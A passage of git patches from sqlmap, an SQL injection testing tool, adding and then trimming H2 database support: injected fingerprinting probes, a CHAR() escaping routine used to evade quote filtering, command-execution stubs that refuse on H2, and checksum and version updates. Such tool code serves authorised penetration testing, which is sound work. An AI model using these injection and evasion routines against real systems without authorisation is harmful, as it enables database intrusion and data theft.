"< 1.8.0"]) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.H2 + logger.warn(warnMsg) + + dbgMsg = "...or version is < 1.7.2" + logger.debug(dbgMsg) + + return False + + def getHostname(self): + warnMsg = "on H2 it is not possible to enumerate the hostname" + logger.warn(warnMsg) diff --git a/plugins/dbms/h2/syntax.py b/plugins/dbms/h2/syntax.py new file mode 100644 index 00000000000..aab5e6b6c8f --- /dev/null +++ b/plugins/dbms/h2/syntax.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + def __init__(self): + GenericSyntax.__init__(self) + + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") + 'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar' + """ + + def escaper(value): + return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value))) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/h2/takeover.py b/plugins/dbms/h2/takeover.py new file mode 100644 index 00000000000..28d922d3f19 --- /dev/null +++ b/plugins/dbms/h2/takeover.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def __init__(self): + GenericTakeover.__init__(self) + + def osCmd(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on H2 it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on H2 it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index a8edb98b829..3f0354974b2 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -569,7 +569,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): @@ -697,7 +697,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -757,7 +757,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None @@ -800,7 +800,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod singleTimeWarnMessage(warnMsg) if not onlyColNames: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 80230ce0f9c..595e8f9a56f 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -67,7 +67,7 @@ def dumpTable(self, foundData=None): conf.db = self.getCurrentDb() elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.db = conf.db.upper() if ',' in conf.db: @@ -83,7 +83,7 @@ def dumpTable(self, foundData=None): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(',') @@ -226,7 +226,7 @@ def dumpTable(self, foundData=None): entries = zip(*[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) @@ -399,7 +399,7 @@ def dumpTable(self, foundData=None): if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 53ef4b474e0..4f2c6d2ae8f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,21 +23,21 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -51bd96b450cbfdbff8eea4801e7486ae lib/controller/checks.py +84316968d7235f53aac7e25069128725 lib/controller/checks.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py -c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py +97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -6f9bc9a98821572b68819b8f12de6b59 lib/core/agent.py +a866dd953fdc4b5273a9c28f6b2361f1 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -11448f59efbfdceff2437239e36d9dc5 lib/core/common.py +ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -4d50e0f893477196d83608175d1a7de4 lib/core/dicts.py +56b79ee7acd2da19c1678250edfdafab lib/core/dicts.py d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py -705fcf5b66cb4518a54e4d717c915968 lib/core/enums.py +ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -deced6d285dcd850e4e7d8e478527729 lib/core/settings.py +1eb1c8d9bf5f38efc0625524d7dfa8ed lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -140,6 +140,13 @@ bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py +271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/h2/connector.py +687005cf105ab50c62b6686866d6ef13 plugins/dbms/h2/enumeration.py +b1ed542fff0aa53c54e8bc07658aeaf1 plugins/dbms/h2/filesystem.py +443bc9ac09ce180360ff5a660ac3d6ba plugins/dbms/h2/fingerprint.py +1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py +4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py +af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py @@ -206,8 +213,8 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -2e0c1c5ced14222d9fef2dd12447d815 plugins/generic/databases.py -ea3a7f87e3e0cbc3aacbd3af4b6f5ce6 plugins/generic/entries.py +ca122ea307ed367a55b12a67a6079e74 plugins/generic/databases.py +35546acab0eea406c23b84363df4d534 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py @@ -477,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml +39173640d6807991a6b78e9bea973339 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index 7278fb08523..db9950f4b43 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -720,6 +720,74 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + From 68f5597b4a2eacbd68602d40cbfebd6a7b5d9529 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 13:26:55 +0200 Subject: [PATCH 327/428] Some cleaning up for #3283 --- lib/core/agent.py | 2 +- lib/core/dump.py | 2 +- lib/core/settings.py | 4 +- plugins/dbms/h2/connector.py | 81 ++------------------------------- plugins/dbms/h2/enumeration.py | 10 ++++ plugins/dbms/h2/fingerprint.py | 41 ++++------------- plugins/dbms/maxdb/connector.py | 2 +- plugins/generic/databases.py | 4 +- txt/checksum.md5 | 18 ++++---- xml/queries.xml | 17 +++---- 10 files changed, 45 insertions(+), 136 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 10ee4cfdde9..48bf658a1bd 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -624,7 +624,7 @@ def concatQuery(self, query, unpack=True): elif fieldsNoSelect: concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop) - elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2): if fieldsExists: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop diff --git a/lib/core/dump.py b/lib/core/dump.py index b5d0b6c6887..444152e8471 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -171,7 +171,7 @@ def currentUser(self, data): def currentDb(self, data): if Backend.isDbms(DBMS.MAXDB): self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2): self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) else: self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) diff --git a/lib/core/settings.py b/lib/core/settings.py index e99c4a3269a..130df4ff707 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.21" +VERSION = "1.2.10.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -265,7 +265,7 @@ REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) -HSQLDB_DEFAULT_SCHEMA = "PUBLIC" +H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC" # Names that can't be used to name files on Windows OS WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") diff --git a/plugins/dbms/h2/connector.py b/plugins/dbms/h2/connector.py index ee605409f27..e9bc44f9edc 100644 --- a/plugins/dbms/h2/connector.py +++ b/plugins/dbms/h2/connector.py @@ -5,87 +5,14 @@ See the file 'LICENSE' for copying permission """ -try: - import jaydebeapi - import jpype -except: - pass - -import logging - -from lib.core.common import checkFile -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.connector import Connector as GenericConnector class Connector(GenericConnector): - """ - Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ - User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html - API: - - Debian package: - - License: LGPL & Apache License 2.0 - """ - def __init__(self): GenericConnector.__init__(self) def connect(self): - self.initConnection() - try: - msg = "what's the location of 'hsqldb.jar'? " - jar = readInput(msg) - checkFile(jar) - args = "-Djava.class.path=%s" % jar - jvm_path = jpype.getDefaultJVMPath() - jpype.startJVM(jvm_path, args) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - try: - driver = 'org.hsqldb.jdbc.JDBCDriver' - connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) - self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except Exception, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except Exception, msg: # TODO: fix with specific error - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - upper_query = query.upper() - - if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): - query = "VALUES %s" % query - - if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query: - query = "%s FROM (VALUES(0))" % query - - self.cursor.execute(query) - retVal = self.cursor.fetchall() - - return retVal + errMsg = "on H2 it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/h2/enumeration.py b/plugins/dbms/h2/enumeration.py index 2035d6f25a9..c4f9560a2ea 100644 --- a/plugins/dbms/h2/enumeration.py +++ b/plugins/dbms/h2/enumeration.py @@ -12,6 +12,7 @@ from lib.core.data import queries from lib.core.common import unArrayizeValue from lib.core.enums import DBMS +from lib.core.settings import H2_DEFAULT_SCHEMA from lib.request import inject class Enumeration(GenericEnumeration): @@ -40,3 +41,12 @@ def getPrivileges(self, *args): def getHostname(self): warnMsg = "on H2 it is not possible to enumerate the hostname" logger.warn(warnMsg) + + def getCurrentDb(self): + return H2_DEFAULT_SCHEMA + + def getPasswordHashes(self): + warnMsg = "on H2 it is not possible to list password hashes" + logger.warn(warnMsg) + + return {} diff --git a/plugins/dbms/h2/fingerprint.py b/plugins/dbms/h2/fingerprint.py index d11313aff81..c2a90521c37 100644 --- a/plugins/dbms/h2/fingerprint.py +++ b/plugins/dbms/h2/fingerprint.py @@ -27,32 +27,28 @@ def getFingerprint(self): value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp and not conf.api: + if wsOsFp: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp and not conf.api: + if dbmsOsFp: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " - actVer = Format.getDbms() if not conf.extensiveFp: - value += actVer + value += DBMS.H2 return value + actVer = Format.getDbms() blank = " " * 15 value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp.get("dbmsVersion") - - if re.search(r"-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer] if banVer else None) + banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() @@ -66,9 +62,6 @@ def checkDbms(self): if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES): setDbms("%s %s" % (DBMS.H2, Backend.getVersion())) - if Backend.isVersionGreaterOrEqualThan("1.7.2"): - kb.data.has_information_schema = True - self.getBanner() return True @@ -90,31 +83,15 @@ def checkDbms(self): return False else: - kb.data.has_information_schema = True - Backend.setVersion(">= 1.7.2") - setDbms("%s 1.7.2" % DBMS.H2) - - banner = self.getBanner() - if banner: - Backend.setVersion("= %s" % banner) - else: - if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): - Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) - else: - banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) - if banner: - Backend.setVersion("= %s" % banner) - else: - Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) + setDbms(DBMS.H2) - return True + self.getBanner() + + return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.H2 logger.warn(warnMsg) - dbgMsg = "...or version is < 1.7.2" - logger.debug(dbgMsg) - return False def getHostname(self): diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index 9b4b8390f85..70295c3c5a0 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -13,6 +13,6 @@ def __init__(self): GenericConnector.__init__(self) def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " + errMsg = "on SAP MaxDB it is not (currently) possible to establish a " errMsg += "direct connection" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 3f0354974b2..b63e57979e1 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -438,7 +438,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod raise SqlmapNoneDataException(errMsg) elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.db = conf.db.upper() if ',' in conf.db: @@ -465,7 +465,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod colList = filter(None, colList) if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB, DBMS.H2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(',') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4f2c6d2ae8f..b4c536e070f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py d6deacb76e1f479b3c690c215fad1c08 lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -a866dd953fdc4b5273a9c28f6b2361f1 lib/core/agent.py +cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -36,7 +36,7 @@ ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py 56b79ee7acd2da19c1678250edfdafab lib/core/dicts.py -d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py +760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py ee7da34f4947739778a07d6c9c05ab54 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1eb1c8d9bf5f38efc0625524d7dfa8ed lib/core/settings.py +5a5c0538e7464803ea3cd2b55b98f991 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -140,10 +140,10 @@ bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py -271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/h2/connector.py -687005cf105ab50c62b6686866d6ef13 plugins/dbms/h2/enumeration.py +79c44d8d0dffc140d38796a32e92a66a plugins/dbms/h2/connector.py +5b99e9a60409f54a140747ce1ca0342f plugins/dbms/h2/enumeration.py b1ed542fff0aa53c54e8bc07658aeaf1 plugins/dbms/h2/filesystem.py -443bc9ac09ce180360ff5a660ac3d6ba plugins/dbms/h2/fingerprint.py +4fe530d10b74210bd045205d9318b5d6 plugins/dbms/h2/fingerprint.py 1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py @@ -162,7 +162,7 @@ b182f01c2ba82aa94fbe4948383ea98d plugins/dbms/informix/fingerprint.py aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py -6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py +9c0307881fae556521bec393956664b0 plugins/dbms/maxdb/connector.py 1f3f9d4c7ec62452ed2465cd9cf50aa1 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py @@ -213,7 +213,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -ca122ea307ed367a55b12a67a6079e74 plugins/generic/databases.py +dd0875db408080c8192c5186d2d9c246 plugins/generic/databases.py 35546acab0eea406c23b84363df4d534 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0a67b8b46f69df7cfacc286b47a0d9a5 plugins/generic/filesystem.py @@ -484,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -39173640d6807991a6b78e9bea973339 xml/queries.xml +c83a948e23219f1d101d3b3aa7eb1391 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index db9950f4b43..ee1cf5ed767 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -676,7 +676,7 @@ - + @@ -739,23 +739,18 @@ - + mirek - + - - - + + - - - - - + From 77f4fd93e7d6e728498c33a45bb5bd1f9ca05073 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Oct 2018 13:27:31 +0200 Subject: [PATCH 328/428] Minor leftover --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/queries.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 130df4ff707..75f7fd2c8cd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.22" +VERSION = "1.2.10.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b4c536e070f..eea24bbaac2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5a5c0538e7464803ea3cd2b55b98f991 lib/core/settings.py +dd0f57aae1f982454ab4ec1ba1dcbda2 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -484,4 +484,4 @@ a279656ea3fcb85c727249b02f828383 xml/livetests.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml 